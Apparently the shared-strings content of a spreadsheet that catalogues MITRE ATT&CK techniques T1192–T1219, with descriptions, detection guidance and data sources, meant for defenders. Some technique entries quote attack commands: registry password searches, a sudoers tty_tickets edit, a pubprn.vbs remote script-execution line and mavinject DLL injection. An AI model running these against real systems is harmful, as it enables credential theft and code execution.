    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.</t>
  </si>
  <si>
    <t>Process Monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>T1192</t>
  </si>
  <si>
    <t>Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attachment malicious files to the email itself, to avoid defenses that may inspect email attachments.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or verify the receipt of an email (i.e. web bugs/web beacons).</t>
  </si>
  <si>
    <t>URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because this technique usually involves user interaction on the endpoint, many of the possible detections for Spearphishing Link take place once User Execution occurs.</t>
  </si>
  <si>
    <t>Packet capture, Web proxy, Email gateway, Detonation chamber, SSL/TLS inspection, DNS records, Mail server</t>
  </si>
  <si>
    <t>T1193</t>
  </si>
  <si>
    <t xml:space="preserve">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 to gain execution.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t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.</t>
  </si>
  <si>
    <t>File monitoring, Packet capture, Mail server, Network intrusion detection system, Detonation chamber, Email gateway</t>
  </si>
  <si>
    <t>T1194</t>
  </si>
  <si>
    <t>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</si>
  <si>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Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.</t>
  </si>
  <si>
    <t>SSL/TLS inspection, Anti-virus, Web proxy</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:
Manipulation of development tools
Manipulation of a development environment
Manipulation of source code repositories (public or private)
Manipulation of software update/distribution mechanisms
Compromised/infected system images (multiple cases of removable media infected at the factory)
Replacement of legitimate software with modified versions
Sales of modified/counterfeit products to legitimate distributors
Shipment interdiction
While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.357358359 Targeting may be specific to a desired victim set360 or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.357359</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Web proxy, File monitoring</t>
  </si>
  <si>
    <t>T1196</t>
  </si>
  <si>
    <t>Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.6263 Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.626364
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.62
Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 6364 or executed as part of multi-stage malware.65 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the Windows Control Panel process binary (control.exe) and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before Rundll32 is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter Rundll32 command, which may bypass detections and/or execution filters for control.exe.2
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace and HKEY_CLASSES_ROOT\CLSID\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel.1
CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).1
Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item.1
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.2</t>
  </si>
  <si>
    <t>API monitoring, Binary file metadata, DLL monitoring, Process command-line parameters, Process Monitoring, Windows Registry, Windows event logs</t>
  </si>
  <si>
    <t>Defense Evasion Persistence</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)15.16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 16 and the BITSAdmin tool.17
Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.181920 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).2118
BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.18</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).11 Active BITS tasks can be enumerated using the BITSAdmin tool (bitsadmin /list /allusers /verbose).2
Monitor usage of the BITSAdmin tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) 3 and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database.4
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).2</t>
  </si>
  <si>
    <t>API monitoring, Packet capture, Windows event logs</t>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <t>n user mode, Windows Authenticode329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function,330 which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.331
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs)332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333) and are identified by globally unique identifiers (GUIDs).331
Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by:331
Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}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all files using that SIP334 (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}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SIP334 (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}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Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.331</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.3
Enable CryptoAPI v2 (CAPI) event logging7 to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033).3
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing)8 setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers:9
HKLM\SOFTWARE\Microsoft\Cryptography\OID
HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
Note: As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using Regsvr32.3
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected.3</t>
  </si>
  <si>
    <t>API monitoring, Application Logs, DLL monitoring, Loaded DLLs, Process Monitoring, Windows Registry, Windows event logs</t>
  </si>
  <si>
    <t>T1199</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</si>
  <si>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 Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems.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 used by the other party for access to internal network systems may be compromised and used.</t>
  </si>
  <si>
    <t>Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.</t>
  </si>
  <si>
    <t>Application Logs, Authentication logs, Third-party application logs</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Computer accessories, computers or networking hardware may be introduced into a system as a vector to gain execution. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping152, man-in-the middle encryption breaking153, keystroke injection154, kernel memory reading via DMA155, adding new wireless access to an existing network156, and others.</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network.
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Asset Management, Data loss prevention</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. An adversary may attempt to access detailed information about the password policy used within an enterprise network.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systems.273274
Windows
net accounts
net accounts /domain
Linux
chage -l &lt;username&gt;
cat /etc/pam.d/common-password
macOS
pwpolicy getaccountpolicies</t>
  </si>
  <si>
    <t>Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.</t>
  </si>
  <si>
    <t>Process command-line parameters, Process Monitoring</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command-Line Interface, Run window, or via scripts.174175 Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd.</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands and/or spawning child processes.8</t>
  </si>
  <si>
    <t>Process Monitoring, Process command-line parameters, Windows event logs</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>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Browser-based Exploitation
Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.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</si>
  <si>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Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>Anti-virus, System calls, Process Monitoring</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via Spearphishing Link that leads to exploitation of a browser or application vulnerability via Exploitation for Client Execution. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and execuited on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.</t>
  </si>
  <si>
    <t>Anti-virus, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>Command and Control Defense Evasion Persistence</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Port Knocking is a well-established method used by both defenders and adversaries to hide open ports from access. To enable the port, the system expects a series of packets with certain characteristics before the port will be opened. This is often accomlished by the host based firewall, but could also be implemented by custom software.
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>Packet capture</t>
  </si>
  <si>
    <t>T1206</t>
  </si>
  <si>
    <t>The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments" 355. Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout that is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
Adversaries can abuse poor configurations of this to escalate privileges without needing the user's password. /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Combined with tty_tickets being disabled, means adversaries can do this from any tty for that user.
The OSX Proton Malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers 356. In order for this change to be reflected, the Proton malware also must issue killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.</t>
  </si>
  <si>
    <t>This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.</t>
  </si>
  <si>
    <t>File monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t xml:space="preserve">DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC).8586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hash.87
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors).85 The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.8586
</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts.512 DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords).2 Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929).1
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies.67
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects.2
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging.7 A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t>API monitoring, Authentication logs, Network protocol analysis, Packet capture</t>
  </si>
  <si>
    <t>T1208</t>
  </si>
  <si>
    <t>Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service187).188189190191
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).192193 Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.193192191
This same attack could be executed using service tickets captured from network traffic.193
Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.190</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).17</t>
  </si>
  <si>
    <t>Windows event logs</t>
  </si>
  <si>
    <t>T1209</t>
  </si>
  <si>
    <t>The Windows Time service (W32Time) enables time synchronization across and within domains.368 W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.369
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.369 The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.369
Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.370</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility.7 There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.3
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.8</t>
  </si>
  <si>
    <t>API monitoring, Binary file metadata, DLL monitoring, File monitoring, Loaded DLLs, Process Monitoring</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>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Scanning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SMB124 and RDP129 as well as applications that may be used within internal networks such as MySQL123 and web server services.125
Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.</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</si>
  <si>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 for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>Windows Error Reporting, Process Monitoring, File monitoring</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>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 The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.</t>
  </si>
  <si>
    <t>Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. 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This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution or evidence of Discovery.</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>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permissions.127128 Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>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Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>Authentication logs, Windows Error Reporting, Process Monitoring</t>
  </si>
  <si>
    <t>T1213</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</si>
  <si>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The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
Policies, procedures, and standards
Physical / logical network diagrams
System architecture diagrams
Technical system documentation
Testing / development credentials
Work / project schedules
Source code snippets
Links to network shares and other internal resources
Common information repositories:
Microsoft SharePoint
Found in many enterprise networks and often used to store and share significant amounts of documentation.
Atlassian Confluence
Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.</t>
  </si>
  <si>
    <t>As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally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The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents.3 The user user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter.4 Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>Application Logs, Authentication logs, Data loss prevention, Third-party application logs</t>
  </si>
  <si>
    <t>T1214</t>
  </si>
  <si>
    <t>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information:83
Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
Current User Hive: reg query HKCU /f password /t REG_SZ /s</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as Reg, and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Windows Registry, Process command-line parameters, Process Monitoring</t>
  </si>
  <si>
    <t>T1215</t>
  </si>
  <si>
    <t>Loadable Kernel Modules (or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system.194 When used maliciously, Loadable Kernel Modules (LKMs) can be a type of kernel-mode Rootkit that run with the highest operating system privilege (Ring 0).195 Adversaries can use loadable kernel modules to covertly persist on a system and evade defenses. Examples have been found in the wild and there are some open source projects.196197198199
Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users.200
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Several examples have been found where this can be used.201202 Examples have been found in the wild.203</t>
  </si>
  <si>
    <t>LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel.14
Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.  These are typically obtained through the operating systems package manager and installed like a normal package.
Adversaries will likely run these commands on the target system before loading a malicious module in order to ensure that it is properly compiled.7
On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe insmod lsmod rmmod modinfo15
For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.</t>
  </si>
  <si>
    <t>System calls, Process Monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site.350 Example command: cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png
There are several other signed scripts that may be used in a similar manner.49</t>
  </si>
  <si>
    <t>Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t xml:space="preserve"> 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
Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser.
Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as Windows Management Instrumentation and PowerShell.
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t>
  </si>
  <si>
    <t>API monitoring, File monitoring, Process command-line parameters, Process Monitoring</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t xml:space="preserve"> Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.
Mavinject.exe
Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process.348
"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;
C:\Windows\system32\mavinject.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;
SyncAppvPublishingServer.exe
SyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe.349
Several others binaries exist that may be used to perform similar behavior.49</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Remote Tool Access</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>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whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.314
Remote access tools may be established and used post-compromise as alternate communications channel for Redundant Access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.315316</t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.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
Domain Fronting may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</t>
  </si>
  <si>
    <t>Network intrusion detection system, Network protocol analysis, Process use of network, Process Monitoring</t>
  </si>
  <si>
    <t>MAX</t>
  </si>
  <si>
    <t>Avg</t>
  </si>
  <si>
    <t>Anti-virus</t>
  </si>
  <si>
    <t>API monitoring</t>
  </si>
  <si>
    <t>Application logs</t>
  </si>
  <si>
    <t>BIOS</t>
  </si>
  <si>
    <t>Browser extensions</t>
  </si>
  <si>
    <t>Data loss prevention</t>
  </si>
  <si>
    <t>Detonation chamber</t>
  </si>
  <si>
    <t>Digital Certificate Logs</t>
  </si>
  <si>
    <t>DLL monitoring</t>
  </si>
  <si>
    <t>EFI</t>
  </si>
  <si>
    <t>Email gateway</t>
  </si>
  <si>
    <t>Environment variable</t>
  </si>
  <si>
    <t>Network device interface</t>
  </si>
  <si>
    <t>Kernel drivers</t>
  </si>
  <si>
    <t>Loaded DLLs</t>
  </si>
  <si>
    <t>Mail server</t>
  </si>
  <si>
    <t>Malware reverse engineering</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Network device logs</t>
  </si>
  <si>
    <t>Network intrusion detection system</t>
  </si>
  <si>
    <t>Network protocol analysis</t>
  </si>
  <si>
    <t>PowerShell logs</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>Process use of network</t>
  </si>
  <si>
    <t>Sensor health and status</t>
  </si>
  <si>
    <t>Services</t>
  </si>
  <si>
    <t>SSL/TLS inspection</t>
  </si>
  <si>
    <t>System calls</t>
  </si>
  <si>
    <t>Third-party application logs</t>
  </si>
  <si>
    <t>User interface</t>
  </si>
  <si>
    <t>VBR</t>
  </si>
  <si>
    <t>Web application firewall logs</t>
  </si>
  <si>
    <t>Web logs</t>
  </si>
  <si>
    <t>Web proxy</t>
  </si>
  <si>
    <t>Windows Error Reporting</t>
  </si>
  <si>
    <t>Windows Registry</t>
  </si>
  <si>
    <t>Signature matching</t>
  </si>
  <si>
    <t>Local port monitoring</t>
  </si>
  <si>
    <t>Syslog monitoring</t>
  </si>
  <si>
    <t>a</t>
  </si>
  <si>
    <t>Max</t>
  </si>
  <si>
    <t>aa</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
